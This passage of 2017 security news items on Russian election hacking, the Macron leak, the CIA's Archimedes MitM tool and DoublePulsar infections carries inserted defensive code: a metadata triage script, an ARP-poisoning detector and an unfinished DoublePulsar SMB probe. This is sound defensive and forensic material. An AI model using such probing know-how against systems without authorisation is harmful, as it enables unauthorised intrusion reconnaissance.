He has confirmed that the agency is investigating Russian interference in last year's presidential election and notably Moscow's possible collusion with Trump's campaign.

Democrats -- already angry that Congressional inquiries into Russian meddling have been hamstrung by Republicans' willingness to defend Trump -- voiced sharp concerns that the FBI's investigation may now be in jeopardy too, with several calling for an independent commission to take over the probe.

"This is nothing less than Nixonian," charged Senator Patrick Leahy of Vermont, who called Trump's official justification for firing Comey "absurd."

"That fig leaf explanation seeks to cover the undeniable truth: The president has removed the sitting FBI director in the midst of one of the most critical national security investigations in the history of our country -- one that implicates senior officials in the Trump campaign and administration," he charged.

When Trump initially decided to keep Comey -- who was appointed by Barack Obama -- in his job, it raised eyebrows from critics who saw it as a tacit reward for his role in damaging Clinton's chances.

But within months, the FBI chief was back in the national spotlight -- this time taking aim at Trump.

During testimony to Congress last month, Comey flatly rejected Trump's explosive claim that he was wiretapped by his predecessor.

Comey's public testimony -- watched by millions around the world -- came as Trump sought to steer the news focus by calling the question of Russian election meddling "fake news."

But it had become increasingly clear that Comey had set his sights on the issue of Russia's election meddling, which has stalked Trump's presidency since he took office.


U.S. Alerted France to Russia Hack Targeting Macron: NSA

10.5.2017 securityweek BigBrothers
The head of America's National Security Agency said Tuesday that Russia was behind the 11th-hour hack of French President-elect Emmanuel Macron's campaign team, and that US officials had informed France a cyber-attack was underway.

The hacking attack on Macron's campaign, just hours ahead of Sunday's run-off vote that saw him elected, led to thousands of files being leaked online.

"We had become aware of Russian activity," Admiral Mike Rogers told a Senate Armed Services Committee hearing.

"We had talked to our French counterparts prior to the public announcements of the events that were publicly attributed this past weekend and gave them a heads up.

"'Look, we're watching the Russians, we're seeing them penetrate some of your infrastructure. Here's what we've seen, what can we do to try and assist?'" said Rogers, who also heads US Cyber Command.

The NSA chief did not specify what type of "infrastructure" had been compromised. He said that the agency was in contact with its counterparts in Britain and Germany ahead of elections in those countries later this year.

Rogers drew comparisons between the hack targeting Macron and those of the US Democratic Party and a close aide to presidential candidate Hillary Clinton ahead of the November election won by Donald Trump.

Washington has officially accused Russia of being behind those hacks, saying Moscow was trying to boost Trump's chances of victory.

"The Russians appear to be assessing that some leaders might be more inclined to be supportive of their positions," Rogers told lawmakers.

"You saw that just play out in the French election where there clearly was a difference between these two candidates and their views of Russia," he said.

Thousands of emails and documents from Macron's campaign were dumped online by hackers shortly before midnight in France on Friday and were then relayed by anti-secrecy group WikiLeaks.

A statement from the 39-year-old Macron called it a "massive and coordinated" hack. Paris prosecutors have opened a probe into the attack, a source close to the investigation has said.


#MacronLeaks metadata suggests Russian threat actors behind Macron’s hack
9.5.2017 securityaffairs BigBrothers

#MacronLeaks – Experts discovered evidence suggesting Russian threat actors behind the hack of French presidential candidate Macron.
Who are the hackers that attempted to subvert the final vote of the French Presidential Election by targeting Macron’s campaign?

Hackers leaked a 9GB batch of internal documents through the Magnet file-sharing service. The Macron data leak happened during the period in which candidates are banned from publicly discussing the campaign; events of this kind can clearly subvert the final result of the election.

Security experts and media blamed Russia for the attack, but without referencing solid clues.

According to a report published by Trend Micro in April, the notorious APT28 group spied on numerous high-profile targets, including Macron’s campaign.

Now it seems that analysts have discovered evidence that suggests the involvement of Russia-linked threat actors.

The files stolen from Macron’s staff systems were initially distributed via links posted on 4Chan and then shared by WikiLeaks.

Forensic experts analyzed file metadata that seems to be linked to a Russian government contract employee; this person is suspected of having falsified some of the dumped documents for obvious reasons.

WikiLeaks, which was informed of the discovery, acknowledged the presence of metadata pointing to a Russian company with ties to the government.

The experts discovered that the name of an employee for the Russian government security contractor Evrika appears 9 times in the metadata of the leaked dump.


WikiLeaks @wikileaks
#MacronLeaks: name of employee for Russian govt security contractor Evrika appears 9 times in metadata for "xls_cendric.rar" leak archive
11:44 PM - 6 May 2017
Evrika (“Eureka”) ZAO is a Russian ICT firm based in St. Petersburg that is known for its collaboration with the Kremlin. The company also works for the Federal Security Service of the Russian Federation (FSB).
The metadata in some Microsoft Office files included in the dump shows that the last person to have edited the documents is “Roshka Georgiy Petrovich,” an Evrika ZAO employee.

Matt Suiche @msuiche
Dropping files after appending metadata to Microsoft Offices files such as "Автор" or "Область_печати" Why? #attribution H/T @voulnet
9:45 AM - 6 May 2017
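The kind of metadata triage the tweets above refer to, as an added example that is not the researchers' own tooling: Office documents in the OOXML format (.docx/.xlsx/.pptx) are zip packages whose docProps/core.xml part holds the author, last-modified-by and timestamp fields, and they can be read offline with the standard library. The sample package and the names in it are constructed for this example. As x0rz's demonstration shows, these fields are unsigned XML that anyone can edit, so the code treats a Cyrillic hit as a lead for further investigation, not as attribution.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by docProps/core.xml in OOXML packages.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
}

# Core-property fields worth reporting when triaging a leaked document set.
CORE_FIELDS = (
    ("creator", "dc:creator"),
    ("lastModifiedBy", "cp:lastModifiedBy"),
    ("created", "dcterms:created"),
    ("modified", "dcterms:modified"),
)

CYRILLIC = re.compile(r"[\u0400-\u04FF]")


def build_sample_package(creator, last_modified_by, modified, include_core=True):
    """Constructed sample, not a real leaked file: a minimal OOXML-style zip
    containing only the parts this example reads. Real files have many more parts."""
    core_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        "<cp:coreProperties"
        f' xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}"'
        f' xmlns:dcterms="{NS["dcterms"]}" xmlns:xsi="{NS["xsi"]}">'
        f"<dc:creator>{creator}</dc:creator>"
        f"<cp:lastModifiedBy>{last_modified_by}</cp:lastModifiedBy>"
        f'<dcterms:modified xsi:type="dcterms:W3CDTF">{modified}</dcterms:modified>'
        "</cp:coreProperties>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        if include_core:
            z.writestr("docProps/core.xml", core_xml)
    return buf.getvalue()


def extract_core_properties(package_bytes):
    """Return the core properties of an OOXML package as a dict.

    Nothing signs or seals these values: they are plain XML inside a zip and
    can be set to anything before a file is dropped, so they are leads, not proof.
    """
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as z:
        if "docProps/core.xml" not in z.namelist():
            return {}
        root = ET.fromstring(z.read("docProps/core.xml"))
    props = {}
    for name, path in CORE_FIELDS:
        el = root.find(path, NS)
        if el is not None and el.text:
            props[name] = el.text
    return props


def triage_package(package_bytes):
    """Extract the core properties and list the fields that contain Cyrillic letters."""
    props = extract_core_properties(package_bytes)
    flagged = sorted(k for k, v in props.items() if CYRILLIC.search(v))
    return {"properties": props, "cyrillic_fields": flagged}


if __name__ == "__main__":
    # Constructed values: an ASCII creator and a Cyrillic last-modified-by name.
    sample = build_sample_package("analyst-a", "Тестовый Пользователь", "2017-05-01T10:00:00Z")
    print(triage_package(sample))
```

Run over a whole dump, the useful output is not any single hit but the distribution: the same editor name recurring across files from different originating accounts, or modification timestamps clustered after the claimed exfiltration date, is what turns a flag into a question worth asking.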

The metadata related to the upload of the Macron files to archive.org also includes an e-mail address (frankmacher1@gmx.de) for the person who performed the upload:

Pwn All The Things @pwnallthethings
What kind of monster does their mandatory training on time without being reminded? You want a guy who employs folks like that as President?
6 May

Pwn All The Things @pwnallthethings
Well this is fun pic.twitter.com/oXsH83snCS
3:41 AM - 6 May 2017

The e-mail address frankmacher1@gmx.de is registered with a German free webmail provider that was used in past operations by the APT28 group for phishing campaigns against the US DNC and German Chancellor Angela Merkel’s political party.

Experts believe that APT28 edited the documents and spread them via social media as part of a PSYOPs operation, like the one conducted against Clinton’s party during the 2016 Presidential Election.

I reached out to my colleague Emanuele Gentili (@emgent), Director of Cyber Intelligence of the Italian security firm TS-WAY, who shared with me this interesting document:

MacronLeak_and_russia_link_chart_v0.1a


What Can be Expected in Trump's Cybersecurity Executive Order?

9.5.2017 securityweek BigBrothers
Executive Order - Cybersecurity

The latest draft of President Trump's much anticipated cybersecurity executive order was posted to the internet last week by security consultant Paul Rosenzweig. It is not the first and may not be the last draft that gets public scrutiny before the final version is formally published. Although it is currently a draft, it provides detailed insight into what can be expected.

The draft Trump Cybersecurity executive order (EO) follows the recent trend in legislation and regulation to take responsibility for cybersecurity away from the practitioners (CIOs and CISOs) and force it to the top of an organization. Agency Heads will be responsible for security and will be required to report regularly to the OMB and DHS (or the Secretary of Defense and the Director of National Intelligence for national security systems).

The latest draft cybersecurity EO displays semantic rather than substantive changes over the previous leaked version -- although with a new section on security workforce development that includes monitoring the workforce development of potential adversaries. The limited changes could suggest that this EO is close to being issued; however, with no federal CISO to replace Gregory Touhill (who resigned Jan. 17) yet announced, it is equally likely there will yet be some delay.

Touhill publicly announced his resignation on LinkedIn. He said, "Frankly, we don't need more policies, we need to execute the ones we have and eliminate the ones that no longer are aligned with contemporary best practices."

Nevertheless, he went on to describe what lies at the heart of Trump's draft EO: "We need a better architecture focused on shared services capabilities rather than one built on organization charts. We need accountability and ownership built into our culture. We need to intelligently leverage cloud computing and mobility solutions that produce effective, efficient, and secure results. We need to do regular risk assessments across each department and agency. We need to better train and regularly exercise our personnel."

The draft EO does indeed focus on a better and updated architecture, and a risk management approach to securing federal systems. It notes, for example, "The executive branch has for too long accepted antiquated and difficult-to-defend IT." Not everyone agrees, however, that updating systems should be the priority -- with suggestions that securing new and complex systems will be no easier than securing older, more simple systems.

There is no explicit definition of an 'antiquated' IT system, although the draft does call out 'known but unmitigated vulnerabilities'. These include "using operating systems or hardware beyond the vendor's support lifecycle..." Antiquated may effectively mean 'no longer supported'; although it is worth noting that on 12 April 2017, Frank Konkel wrote in NextGov, "The U.S. nuclear arsenal is coordinated by the 54-year-old Strategic Automated Command and Control System, run on 1970s-era IBM mainframes that still use 8-inch floppy disks."

Risk management is specified and required. "Agency Heads will be held accountable by the President for implementing risk management measures commensurate with the risk and magnitude of the harm that would result from unauthorized access, use, disclosure, disruption, modification, or destruction of IT and data. They will also be held accountable by the President for ensuring that cybersecurity risk management processes are aligned with strategic, operational, and budgetary planning processes, in accordance with chapter 35, subchapter II of title 44, United States Code."

Risk management is specifically tied to "The Framework for Improving Critical Infrastructure Cybersecurity (the Framework), or any successor document, developed by the National Institute of Standards and Technology to manage the agency's cybersecurity risk."

Protecting the critical infrastructure (CI) is another area of focus. Indeed, the executive order is titled, 'Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure'. The CI is defined as comprising those "entities identified pursuant to section 9 of Executive Order 13636 of February 12, 2013 (Improving Critical Infrastructure Cybersecurity)." The current list identified by the DHS comprises 16 CI sectors, including energy, communications, finance, healthcare, defense and emergency services.

These sectors will be examined to see if federal agencies can provide additional security support in their risk management efforts, and whether there are any obstacles to doing so. There is some criticism, however, that by singling out the section 9 (EO 13636) sectors for special treatment, other critical areas (such as water purification and on-line voting) might suffer.

One area that does cover the wider private sector is the desire to promote resilience against botnets and other automated, distributed threats. Here, "The Secretary of Commerce and the Secretary of Homeland Security shall jointly lead an open and transparent process to identify and promote action by appropriate stakeholders to improve the resilience of the Internet and communications ecosystem and to encourage collaboration with the goal of dramatically reducing threats perpetrated by automated and distributed attacks (e.g., botnets)."

It is perhaps disappointing that there is no specific reference here to the internet of things (IoT); nor indeed any reference to the IoT anywhere in the draft EO. Many security experts fear a dire future of distributed denial of service attacks from IoT-based botnets (such as Mirai); and a more specific targeting of intrinsic IoT insecurity would benefit the entire internet.

The section of the executive order that specifies 'cybersecurity for the nation' is limited to broad brush strokes. The 'policy' is to "promote an open, interoperable, reliable, and secure Internet that fosters efficiency, innovation, communication, and economic prosperity, while respecting privacy and guarding against disruption, fraud, and theft." Subsections talk about deterrence and protection (demanding "options for deterring adversaries and better protecting the American people from cyber threats"); international cooperation (requesting "an engagement strategy for international cooperation in cybersecurity"); and workforce development (including, for example, an assessment of "the scope and sufficiency of U.S. efforts to ensure U.S. national security-related cyber capability advantage").

It would not be possible for a single short document on cybersecurity to satisfy everyone, and there are indeed both strong and weak points in this document. For example, there are fifteen separate reports required by the draft EO, which must be delivered in timescales ranging from 45 days to 240 days from the date of the order. The effect of these reports could be to delay actual implementation of important security policies. It is tempting to recall the words of former federal CISO Gregory Touhill: "We don't need more policies, we need to execute the ones we have..."

One very strong point, however, is that the policy outlined by this executive order (albeit just a draft for now) builds on the cybersecurity efforts already achieved by the previous administration. This will promote an invaluable bi-partisan approach to the future of federal and critical infrastructure security.


Top Obama Officials to Testify on Russian Election Interference

8.5.2017 securityweek BigBrothers
The scandal over Russian meddling in last year's US presidential election returns to the forefront of Washington politics on Monday, after weeks of quiet, when two top officials from the Obama administration are set to testify in Congress.

Sally Yates -- acting attorney general in the Trump administration for 10 days before being fired -- could bring new pressure on the White House over what it knew about former national security adviser Michael Flynn's communications with Russian officials.

Obama's director of national intelligence James Clapper is also set to testify, after repeatedly warning of the need to get to the bottom of how the Russians interfered in the election, and whether anyone on President Donald Trump's team colluded with Moscow.

The case simmered for weeks as attention focused on what keynote legislation the president could push through in his first 100 days, a milestone reached last week.

Congressional investigations into Russian meddling have also been held up by infighting between Democrats and Republicans over how aggressively to pursue a matter that continues to cast a cloud over Trump's election win.

Dianne Feinstein, the top Democrat on the Senate Intelligence Committee, which also is investigating Russia's role in the election, said she is eager to hear Yates's testimony.

"Sally Yates is very much respected. She's a professional. She's not a politician. She's spent a lot of time in the department," Feinstein told NBC News's "Meet the Press" program.

"She apparently has some information as to who knew what when that she is willing to share -- and that would be what she knew about Michael Flynn's connections to Russia," said Feinstein.

- Trump: Russia story is 'phony' -

Trump last week repeated his dismissal of US intelligence chiefs' conclusion that Moscow had sought to boost his campaign over his Democratic rival Hillary Clinton's in an effort overseen by Russian President Vladimir Putin.

In an interview with CBS's "Face the Nation" program marking his 100 days, Trump last week again rejected the official view that Russians hacked Democratic Party computers and communications.

"(It) could have been China, could have been a lot of different groups," he said.

On Tuesday, he again branded the whole story as fake. "The phony Trump/Russia story was an excuse used by the Democrats as justification for losing the election," he said on Twitter.

Trump's dismissals notwithstanding, the Senate Judiciary Committee -- where Yates and Clapper are to appear on Monday -- and the House and Senate intelligence committees are stepping up their probes, calling numerous current and former government witnesses to testify, mostly behind closed doors.

And the FBI is continuing its own investigation into possible collusion.

The country's top intelligence officials say they have no doubt that Moscow tried to swing the election against Clinton last year through hacking and disinformation.

Nor do they doubt that people closely associated with the Trump campaign -- including Flynn, onetime foreign affairs adviser Carter Page and former campaign chairman Paul Manafort -- all had ongoing contacts with Russians.

But whether those contacts resulted in any collusion with Moscow remains unproved.

Asked on CNN last week if she had yet seen evidence of collusion in private intelligence briefings, Feinstein responded: "Not at this time."

In Monday's open hearing, Yates -- an Obama deputy attorney general who was fired by Trump for refusing to support his immigration ban -- reportedly could testify that she warned the incoming administration in January that Flynn's discussions with Russia's US ambassador left Flynn vulnerable to blackmail.

A former military intelligence chief, Flynn was Trump's national security adviser for 24 days before he was fired for lying about the substance of the calls.

Clapper, still bound by secrecy requirements of his former job, might not add more than what the intelligence community has already said publicly about the scandal.

- Subpoena warnings -

The more serious investigative action in the coming weeks will take place out of the public eye. The House and Senate intelligence committees are holding interviews with current intelligence and Trump campaign officials behind closed doors.

The Senate side has warned possible witnesses, including Flynn, Page and Manafort, that they could be subpoenaed to testify if they do not voluntarily cooperate, according to the New York Times.

In a statement Friday, the top senators of the Senate committee specifically warned Page, a former Moscow-based investment banker, to meet their week-old request for specific documents.

"Should Mr. Page choose to not provide the material requested" by specified dates, they said, "the committee will consider its next steps."


UK Government’s secret programme for mass surveillance on internet and phones leaked
7.5.2017 securityaffairs BigBrothers

According to a draft document leaked online, UK Government is assigning itself more powers to spy on live communications and use malware for surveillance.
While the NSA is announcing that it will stop collecting emails, texts and other internet communications that merely mention a surveillance target, the UK government has secretly drawn up more details of its new bulk surveillance powers, assigning itself the ability to monitor live communications and to use malware for surveillance purposes.


In the draft technical capability notices paper, the UK Government requires communications companies to provide real-time access to the full content of any named individual's communications within one working day, along with "secondary data" relating to that person.

The draft document was obtained by the Open Rights Group, which leaked it.

“To provide and maintain the capability to carry out the interception of, or the obtaining of secondary data from, communications transmitted by means of a postal service and to disclose anything obtained under the warrant to the person to whom the warrant is addressed or any person acting on that person’s behalf within one working day, or such longer period as may be specified in the technical capability notice, of the postal operator being informed that the warrant has been issued.” states the draft. “To provide and maintain the capability to disclose secondary data in a form specified in the technical capability notice.”

The UK Government also intends to have the ability to spy on encrypted communications. In practice this means it could require any company operating a communications service either not to implement end-to-end encryption, or to insert a backdoor.

The authorities will require communication providers to enable bulk surveillance by deploying real-time interception systems capable of monitoring 1 in 10,000 of their customers simultaneously.

Live surveillance of any individual has to be authorised by a secretary of state and overseen by a judge appointed by the prime minister.

The worrying aspect of the draft is that the document has only been provided to a select number of ISPs and telcos for a four-week consultation.

The draft states that its content has already passed through the UK’s Technical Advisory Board, currently composed of telco companies (O2, BT, BSkyB, Cable and Wireless, Vodafone and Virgin Media) and six representatives from the government’s intercepting agencies.

The rules will have to be approved by the two houses of Parliament before becoming law.


Wikileaks Unveils CIA's Man-in-the-Middle Attack Tool
6.5.2017 thehackernews  BigBrothers

Wikileaks has published a new batch of the Vault 7 leak, detailing a man-in-the-middle (MitM) attack tool allegedly created by the United States Central Intelligence Agency (CIA) to target local networks.
Since March, WikiLeaks has published thousands of documents and other secret tools that the whistleblower group claims came from the CIA.
This latest batch is the 7th release in the whistleblowing organization's 'Vault 7' series.
Dubbed Archimedes, the newly released CIA tool, dumped on Friday, was purportedly used to attack computers inside a Local Area Network (LAN).
According to the leaked documents, this MitM tool was previously named 'Fulcrum' but later was renamed to 'Archimedes' with several improvements on the previous version, like providing a way to "gracefully shutting down the tool on demand," and adding "support for a new HTTP injection method based on using a hidden iFrame."
The leaked documents describe Archimedes as a tool that lets users redirect LAN traffic from a targeted computer through a malware-infected computer controlled by the CIA before the traffic is passed on to the gateway, which is known as man-in-the-middle (MitM) attack.

The tool in itself is very simple, without any extraordinary capabilities; there are many MitM tools available on the Internet that anyone can download and use to target users on a local network.
Rendition Infosec founder Jake Williams also pointed out that the tool does not even appear to have been developed by the CIA from scratch; rather, it looks like a repackaged version of Ettercap, an open source toolkit for MitM attacks.
Williams also noted that the potential CIA targets could even use the leaked information to see whether their computers had been targeted by the agency.
Last week, WikiLeaks dumped source code for a more interesting CIA tool known as "Scribbles," a piece of software allegedly designed to embed 'web beacons' into confidential documents, allowing the spying agency to track insiders and whistleblowers.
Since March the whistleblowing website has published 7 batches in the "Vault 7" series, including the latest and last week's leaks, along with the following batches:
"Year Zero" – dumped CIA hacking exploits for popular hardware and software.
"Weeping Angel" – a spying tool used by the agency to infiltrate smart TVs, transforming them into covert microphones.
"Dark Matter" – focused on hacking exploits the agency designed to target iPhones and Macs.
"Marble" – revealed the source code of a secret anti-forensic framework, basically an obfuscator or packer used by the CIA to hide the actual source of its malware.
"Grasshopper" – revealed a framework which allowed the agency to easily create custom malware for breaking into Microsoft Windows and bypassing antivirus protection.


WikiLeaks Details MitM Attack Tool Used by CIA

6.5.2017 securityweek BigBrothers
WikiLeaks has released documents detailing a man-in-the-middle (MitM) attack tool allegedly used by the U.S. Central Intelligence Agency (CIA) to target local networks.

The tool, initially called Fulcrum and later renamed Archimedes by its developers, can be used to conduct MitM attacks within a local area network (LAN). The leaked documents, dated between 2011 and 2014, describe it as a tool that allows the user to redirect LAN traffic from a targeted computer through an attacker-controlled machine before it’s passed on to the gateway.

“This enables the tool to inject a forged web-server response that will redirect the target’s web browser to an arbitrary location. This technique is typically used to redirect the target to an exploitation server while providing the appearance of a normal browsing session,” developers wrote in the tool’s user guide.

Jake Williams, founder of Rendition Infosec and SANS instructor, analyzed the leaked documents and determined that the tool appears to be a repackaged version of Ettercap, a popular MitM tool.

While the tool’s capabilities are not impressive, Williams pointed out that potential targets of the CIA can use the leaked information to see if their systems had been targeted by the agency.

Jake Williams (@MalwareJake), 5 May 2017: ".@wikileaks In short, nothing to get excited about media peeps. I was talking about this capability to an entry level hacking class Wed night 5/n"

Jake Williams (@MalwareJake), 5 May 2017, 12:41 PM: ".@wikileaks Honestly I'm more interested in how WikiLeaks tries to spin this than I am in the tool itself. 6/6"

A more interesting tool, including its source code, was published by WikiLeaks last week. The project, dubbed Scribbles, is designed for inserting special watermarks into documents that may be copied by insiders and whistleblowers.

The first major version of the Scribbles tool was released in March 2016 and it may have been developed by the CIA to identify people such as Edward Snowden, who in 2013 leaked a massive amount of information on the NSA’s surveillance capabilities.

WikiLeaks has already released numerous documents as part of its “Vault 7” dump. In the past weeks, the whistleblower organization has made public documents describing various tools, including ones for hacking Samsung smart TVs, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

Many of the tools are outdated and the vulnerabilities they leverage have already been patched. However, the leaked information can be very useful for entities that may have been targeted with these exploits.

In fact, researchers at Symantec and Kaspersky have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as Longhorn and The Lamberts.


WikiLeaks leaked documents that detail the Archimedes tool used by the CIA in MitM attacks
6.5.2017 securityaffairs BigBrothers

WikiLeaks has released a new batch of documents detailing a man-in-the-middle (MitM) attack tool dubbed Archimedes, allegedly used by the CIA to target local networks.

The leaked documents, dated between 2011 and 2014, provide details about a tool initially codenamed Fulcrum and later renamed Archimedes by the development team.


The CIA hacking tool allows operators to redirect LAN traffic from a targeted computer through a machine controlled by the attackers before it is routed to the gateway.

“Archimedes is an update to Fulcrum 0.6.1.” reads the Archimedes Tool Documentation. “Archimedes is used to redirect LAN traffic from a target’s computer through an attacker controlled computer before it is passed to the gateway. This enables the tool to inject a forged web-server response that will redirect the target’s web browser to an arbitrary location. This technique is typically used to redirect the target to an exploitation server while providing the appearance of a normal browsing session. For more tool information please refer to the original Fulcrum 0.6.1 documentation.”
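The redirection described above (target's traffic transiting the attacker's machine before the gateway) is what Ettercap, the tool Williams compares it to, normally achieves by ARP-cache poisoning: the attacker answers ARP for the gateway with its own MAC. What a defender wants is the check for that symptom on the wire. The following is an added example, not code from the leaked documents, from Ettercap or from the articles: a small ARP watch that parses raw Ethernet/ARP frames and flags the gateway suddenly answering from a new MAC, one MAC claiming several IPs, and an ARP sender MAC that does not match the Ethernet source. All frames, MACs and addresses in it are constructed for the demonstration.

```python
"""ARP-cache poisoning watch for a LAN segment (added example, constructed traffic)."""
import ipaddress
import struct

ETH_P_ARP = b"\x08\x06"
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_frame(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II + ARP (RFC 826); used here only to construct sample traffic."""
    eth_dst = b"\xff" * 6 if oper == ARP_REQUEST else target_mac
    eth = eth_dst + sender_mac + ETH_P_ARP
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, oper,
                      sender_mac, ipaddress.IPv4Address(sender_ip).packed,
                      target_mac, ipaddress.IPv4Address(target_ip).packed)
    return eth + arp


def parse_arp_frame(frame):
    """Return the fields of an IPv4-over-Ethernet ARP frame, or None if it is not one."""
    if len(frame) < 42 or frame[12:14] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper, "eth_src": mac_str(frame[6:12]),
            "sha": mac_str(sha), "spa": str(ipaddress.IPv4Address(spa)),
            "tha": mac_str(tha), "tpa": str(ipaddress.IPv4Address(tpa))}


class ArpWatch:
    """Tracks IP->MAC bindings seen on the wire and flags poisoning symptoms."""

    def __init__(self, gateway_ip):
        self.gateway_ip = gateway_ip
        self.ip_to_mac = {}
        self.mac_to_ips = {}

    def observe(self, frame):
        """Feed one frame; returns a list of (alert, detail) tuples, empty if benign."""
        a = parse_arp_frame(frame)
        if a is None:
            return []
        alerts = []
        ip, mac = a["spa"], a["sha"]
        # 1. Crafted frames often carry an ARP sender MAC that differs from the Ethernet source.
        if mac != a["eth_src"]:
            alerts.append(("eth-arp-mac-mismatch", "%s: %s vs %s" % (ip, a["eth_src"], mac)))
        # 2. A known IP (above all the gateway) suddenly answers from a different MAC.
        known = self.ip_to_mac.get(ip)
        if known and known != mac:
            kind = "gateway-mac-changed" if ip == self.gateway_ip else "ip-mac-changed"
            alerts.append((kind, "%s: %s -> %s" % (ip, known, mac)))
        # 3. One MAC claims several IPs: a poisoner impersonating gateway and victim at once.
        claimed = self.mac_to_ips.setdefault(mac, set())
        if claimed and ip not in claimed:
            alerts.append(("mac-claims-multiple-ips", "%s: %s" % (mac, sorted(claimed | {ip}))))
        claimed.add(ip)
        self.ip_to_mac[ip] = mac
        return alerts


def run_demo():
    """Constructed scenario: a benign exchange, then a poisoner hitting both sides."""
    gw_mac, victim_mac, evil_mac = (bytes.fromhex(h) for h in
                                    ("0200000000a1", "0200000000b2", "0200000000c3"))
    gw, victim = "192.168.1.1", "192.168.1.10"
    watch = ArpWatch(gateway_ip=gw)
    frames = [
        build_arp_frame(ARP_REQUEST, victim_mac, victim, b"\x00" * 6, gw),  # who has the gateway?
        build_arp_frame(ARP_REPLY, gw_mac, gw, victim_mac, victim),         # legitimate answer
        build_arp_frame(ARP_REPLY, evil_mac, gw, victim_mac, victim),       # poison the victim
        build_arp_frame(ARP_REPLY, evil_mac, victim, gw_mac, gw),           # poison the gateway
    ]
    return [alert for f in frames for alert in watch.observe(f)]


if __name__ == "__main__":
    for kind, detail in run_demo():
        print(kind, detail)
```

On a real segment the frames would come from a raw socket or a pcap rather than `run_demo()`; the rule about one MAC owning several IPs needs an allow-list for routers and virtual-IP hosts that legitimately do so.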

According to SANS instructor Jake Williams, who analyzed the leaked documents, the Archimedes tool appears to be a repackaged version of the popular MitM tool Ettercap.

Jake Williams (@MalwareJake), 5 May 2017, 12:34 PM: "The new dump by @wikileaks, FULCRUM, appears to be nothing more than a repackaged ettercap. Honestly nothing to write home about 1/n"
Alleged CIA targets can use the leaked information about the Archimedes tool to check whether their systems have been compromised by US intelligence.

Potential victims can search for these hashes on their systems.

[Figure: file hashes from the Archimedes documentation; the image is not reproduced here]

Archimedes introduced several improvements over the Fulcrum tool, such as:

Support disabling the route verification check that occurs prior to exploitation.
Add support for a new HTTP injection method based on using a hidden IFRAME.
Modify the DLLs to support the Fire and Forget specification (version 2).
Provide a method of gracefully shutting down the tool on demand.
Removes the most alerting strings from the release binaries.
The tool itself is not sophisticated; what would be more interesting to understand is how CIA operators used it in targeted attacks.


NSA Cyber Weapons installed in High Profile Targets in Greece
4.5.2017 securityaffairs BigBrothers

The installation of the monitoring software was carried out either by the NSA's highly sophisticated hacking team or by hackers who leveraged the tools leaked by the Shadow Brokers.
Last week, a collection of spy tools allegedly used by the National Security Agency for operations against global targets of interest was leaked online by the underground hacking group, Shadow Brokers.

The tools were released online in the following form and were accessible to anyone:

[Figure: listing of the leaked toolkit as published; image not reproduced here]
NSA’s cyber-weapons include many exploits for Microsoft Windows, Lotus Notes, MDaemon Webadmin, IIS, Solaris systems and Microsoft Exchange, as well as additional Python-based tools.


These tools (Fuzzbunch, EternalBlue, DoublePulsar, DanderSpritz) are part of the powerful NSA hacking toolset (sometimes called the "NSA Metasploit") used by the intelligence organization for hacking operations against governments, companies, and organizations.


THE RESEARCH

SecNews researchers conducted a thorough study of the Shadow Brokers leak, mainly focusing on its effects. As is already known, the leaked NSA backdoor (DoublePulsar) has been found installed on thousands of computers and servers around the world. A map of the affected countries is presented below:

[Figure: map of countries with DoublePulsar-infected hosts; image not reproduced here]

The purpose of SecNews research, considering the importance of the leaked data, was to identify companies or networks exclusively from the Greek Territory that have been targeted by malicious activities related to NSA’s cyber weapons.

After analyzing the leaked NSA toolkit and taking into consideration its particular digital fingerprints, we conducted an investigation to detect which IP addresses in Greece are affected by the NSA cyber weapons.

The assessment procedure was carried out in the following steps:

Firstly, we scanned the Greek Internet for publicly exposed SMB (port 445) and Remote Desktop (RDP, port 3389) services.
We detected 1086 IP addresses with SMB exposed online.
We detected 4263 IP addresses with Remote Desktop exposed online.
Then, using properly parameterized tools and scripts (masscan, and the detect_doublepulsar_rdp and detect_doublepulsar_smb Python scripts) in conjunction with the NSA-leaked files, we detected where the cyber weapon is installed.
The final findings/results are shown in the table below. For security reasons, the IP addresses are hidden, to protect the targeted companies/organizations, so that a malicious user cannot abuse the already-installed backdoor on them.
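The SMB side of that last step rests on one documented quirk of the implant, and it is worth seeing the check itself rather than only the tool name. The following is an added example, not SecNews' code and not the detect_doublepulsar_smb script, although it implements the same publicly known probe: after an anonymous SMB1 session, a Trans2 request with subcommand SESSION_SETUP (0x000e) is sent; a clean host echoes the request's Multiplex ID (0x41), whereas a host running DoublePulsar answers with 0x51 and the SecurityFeatures bytes of its reply header encode the implant's XOR key. Packet layouts follow MS-CIFS; the ping opcode encoding (the bytes of the Timeout field sum to 0x23, "ping") and the key derivation are taken from public analyses of the leaked implant. `probe()` needs network access and authorisation for the host you point it at; the parsing and packet-building functions run offline on the constructed packets below.

```python
"""Probe an SMBv1 host for the DoublePulsar implant (added example)."""
import socket
import struct

PING_MID = 0x41            # Multiplex ID in the ping request; clean hosts echo it
IMPLANT_MID = 0x51         # Multiplex ID the implant uses in its reply
PING_TIMEOUT = 0x00A4D9A6  # bytes a6 d9 a4 00 sum to 0x223; low byte 0x23 is "ping"
SMB_FLAGS, SMB_FLAGS2 = 0x18, 0x4001  # canonical/case-insensitive paths; NT status + long names


def netbios(payload):
    """NetBIOS session service framing: type 0x00 + 24-bit big-endian length."""
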